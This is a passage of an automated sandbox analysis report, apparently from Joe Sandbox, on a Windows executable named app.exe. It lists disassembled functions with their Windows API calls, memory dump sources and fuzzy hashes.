                                                                                                                                                                                                            • Instruction ID: a0594fe39f613e1219e537d0585ba99ccaa10125fb162a6ec74b8fa647851624
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74f536612ec3a1de1ddf9941b97d8d2648c32dadeff25fcc8e51b87fe650bca5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40B18126A09BC582EA52CF19E5083AEB365FB99BC4F149225DFCD13B55EF38E184C704
                                                                                                                                                                                                            Function 00007FF7ACE9C360 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7ACE9C34B), ref: 00007FF7ACE9C47C
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7ACE9C34B), ref: 00007FF7ACE9C507
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                                            • Opcode ID: d1123a7759acd2de89f70fbc91131bac1b02d2ce66ed859b546e10adeb5b6b1d
                                                                                                                                                                                                            • Instruction ID: 976b4d587a1ece77710c3918bf04aa5d5afe6dc9839d870e617b11c08f6cce7c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1123a7759acd2de89f70fbc91131bac1b02d2ce66ed859b546e10adeb5b6b1d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D891F332F0D651A5F760BF2594402BDEBA0BB44B88F965179EE0E736A5CF38D442C720
                                                                                                                                                                                                            Function 00007FF8A801AEB0 Relevance: 6.2, APIs: 4, Instructions: 215COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$Leave$ConditionEnterVariableWake
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3011652882-0
                                                                                                                                                                                                            • Opcode ID: 2e30f4d2f2018c02790c919412a76438bbd4c4300fda291f528bb64174e28d57
                                                                                                                                                                                                            • Instruction ID: 4aa65d604ae15b8404634c90ab1ddc1cd82708a8be69b45d41662f2d7c54b8e0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e30f4d2f2018c02790c919412a76438bbd4c4300fda291f528bb64174e28d57
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70B13432A05B84D2DB518F29C5402AC73A0F758BA8F199236DF8D0B7A5EF34E4E2C350
                                                                                                                                                                                                            Function 00007FF8A815D410 Relevance: 6.2, APIs: 4, Instructions: 191COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$exit
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2160831268-0
                                                                                                                                                                                                            • Opcode ID: 32b11179d1529e66b52719390933783550660ec49ee9398389267b16f45078e9
                                                                                                                                                                                                            • Instruction ID: 6e6c903c2d41ade2d3c557690ae5416ed6d187cb5ba797a06bb034d61a877aec
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 32b11179d1529e66b52719390933783550660ec49ee9398389267b16f45078e9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD915B32A19BC09AE722CF65E8446DA77B8FB49788F104225EF8D17B58DF38C255C704
                                                                                                                                                                                                            Function 00007FF8A801AC20 Relevance: 6.2, APIs: 4, Instructions: 160COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$ConditionEnterLeaveSleepVariablememmove
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 344065560-0
                                                                                                                                                                                                            • Opcode ID: e4b5aa4b9a7224623dab710b7ffaf5fe7c86679c6d40ccdea8fd898106e469b7
                                                                                                                                                                                                            • Instruction ID: 3109b26249cc27adaf0945ea3c455cdd5801bb180e21d253c3847a1399596522
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4b5aa4b9a7224623dab710b7ffaf5fe7c86679c6d40ccdea8fd898106e469b7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D715C32A06A85D2DF11DF25E4402AEB7A0FB48BE8F484636DE5E47794DF38E491C354
                                                                                                                                                                                                            Function 00007FF8A801C890 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Initialize$ConditionCriticalSectionVariablecallocmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3763664433-0
                                                                                                                                                                                                            • Opcode ID: a7079338ca544f0934132894acb3f610a6a096579ba7d3594c8590f5f8354e28
                                                                                                                                                                                                            • Instruction ID: 8af8daf0df151dc138ad8138c8e0ab7161f710e20d59ef9ca7bb6a44902ed3c6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7079338ca544f0934132894acb3f610a6a096579ba7d3594c8590f5f8354e28
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5117C32F1AB86D6EA10CF22A44426A6364FB88BD0F094035DA4E47B98CF3CE5928754
                                                                                                                                                                                                            Function 00007FF7ACE81F70 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1956198572-0
                                                                                                                                                                                                            • Opcode ID: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                                                                                                            • Instruction ID: 58a65c6440307b1ad4e30c85d11bc672b32ab3fc8ef068a7c1a3a46b019d445e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B110031E1D18251F650A759E6452BDB292EF897C1FC98030E94917BBDCE3CD4D54710
                                                                                                                                                                                                            Function 00007FF8A801D8C0 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2988086103-0
                                                                                                                                                                                                            • Opcode ID: 4e5947b948060117f2c62a09ef1e1ee024439e58e4770e829615e6e616b0194f
                                                                                                                                                                                                            • Instruction ID: 290d4dac3f7920187347a5958dc5287915c1d16d117c24a5b0215d7f646fe2a9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e5947b948060117f2c62a09ef1e1ee024439e58e4770e829615e6e616b0194f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83015E62A0BA8192EE458F15E544279A320FF99BE4F088131DF4E07695DF3CD4A58714
                                                                                                                                                                                                            Function 00007FF8A7FF2DA0 Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Dealloc$Buffer_FreeMem_Release
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2882253451-0
                                                                                                                                                                                                            • Opcode ID: 15be4633d763fe3f27dac38c57d4b498a389c40a1c0ef012ad84e7f158834181
                                                                                                                                                                                                            • Instruction ID: fdae549183e5030b302e3e65a0e93b1b3bdec9059399c5f433ff380656fd40f4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15be4633d763fe3f27dac38c57d4b498a389c40a1c0ef012ad84e7f158834181
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE110523E1AE8292EB14CF74D85437C2360FFA9B88F155236DA4D055A5DFBCE6E18318
                                                                                                                                                                                                            Function 00007FF8A7FF7670 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Dealloc$Buffer_Release
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2626048392-0
                                                                                                                                                                                                            • Opcode ID: b0c8c7c23bdba7e767728f2496180f1dd281cb7af734209321a1bbaebd29e6c4
                                                                                                                                                                                                            • Instruction ID: 4cc5f4a45258c5749850065004cecd6975fe5648f4152ea9a6091740c0c2cda2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0c8c7c23bdba7e767728f2496180f1dd281cb7af734209321a1bbaebd29e6c4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A016932A0BA42E1FF588FB9981433C63A0EF24F98F590030CE0D06190CF7EA6429331
                                                                                                                                                                                                            Function 00007FF8A8131100 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8A8131112
                                                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8A8131122
                                                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8A8131132
                                                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8A813113F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                                                            • Opcode ID: 4ebfb70ede594ebaf107e5ca743f029a4f082bc050425717ab4e90a4d75e1f49
                                                                                                                                                                                                            • Instruction ID: 4bdaa8ee8e61533784bf72026223d0792c875db4a0b28aea1998a4ce866b6c0d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ebfb70ede594ebaf107e5ca743f029a4f082bc050425717ab4e90a4d75e1f49
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FF039E0E0B10A72F98B9775A98A3B8126ADF04BD1F445835D18E01A5CDF5CA0D4C23A
                                                                                                                                                                                                            Function 00007FF7ACEA4C6C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: ?
                                                                                                                                                                                                            • API String ID: 1286766494-1684325040
                                                                                                                                                                                                            • Opcode ID: 814948e3221e39c8f46cf349b38774dda4ab7a8497a902a8fbf1b82dff6223ab
                                                                                                                                                                                                            • Instruction ID: df0edf3654e27af19dbd32f42cc168342dc3c36f4d3584daece6ea33e66929a2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 814948e3221e39c8f46cf349b38774dda4ab7a8497a902a8fbf1b82dff6223ab
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79415732A0E2826AFB21AB25E401379D6D0EF807A5F995235EE5D17AF5DF3CD4418710
                                                                                                                                                                                                            Function 00007FF8A801B2F0 Relevance: 5.4, APIs: 4, Instructions: 364COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$DeleteEnterLeavefreemallocmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 654641933-0
                                                                                                                                                                                                            • Opcode ID: 3088a103aa531b3f44fa8809426126977969d6e41be397239cee5e96a13218fe
                                                                                                                                                                                                            • Instruction ID: f0daad31f1c847f6752e4bec822a6c42710ab88d00eb43d73a0a26957738214b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3088a103aa531b3f44fa8809426126977969d6e41be397239cee5e96a13218fe
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0028122E09B85D7EB188B35D6503B9B3A0FB69798F049225DB9D13A91DF38F1F48314
                                                                                                                                                                                                            Function 00007FF7ACE97D9C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACE97DCE
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: HeapFree.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D5E
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: GetLastError.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D68
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7ACE8ADA5), ref: 00007FF7ACE97DEC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                            • API String ID: 3580290477-886552919
                                                                                                                                                                                                            • Opcode ID: 78bb50e8dbf74795731634f2bf23dc57cb2593a68118be5c005d29b839edbd54
                                                                                                                                                                                                            • Instruction ID: 7eda0af5dec47f78a8ca63ba6b7b682e21da23ab6636037a79b392ebdaa162c7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78bb50e8dbf74795731634f2bf23dc57cb2593a68118be5c005d29b839edbd54
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB419F32A0EB02E5EB15EF2598810BDE394EF457C4B964035F90E67BA5DF3CE8958360
                                                                                                                                                                                                            Function 00007FF7ACE9C038 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
